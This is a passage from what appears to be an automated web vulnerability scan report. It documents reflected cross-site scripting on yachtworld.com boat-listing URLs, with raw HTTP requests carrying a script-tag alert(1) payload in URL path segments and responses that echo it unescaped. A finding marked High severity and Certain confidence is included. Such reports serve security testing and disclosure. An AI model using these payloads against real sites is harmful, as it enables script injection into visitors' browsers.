GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton9ac7d"><script>alert(1)</script>cc630271c5d/MD/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:15 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:15 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2237772&boat_id=2237772&back=/core/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton9ac7d"><script>alert(1)</script>cc630271c5d/MD/United-States&boat_id=2237772">
...[SNIP]...

3.114. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b31"><script>alert(1)</script>b21ecc1901e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD76b31"><script>alert(1)</script>b21ecc1901e/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.10.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 18 Jan 2011 15:25:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:42 GMT
Set-Cookie: VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fn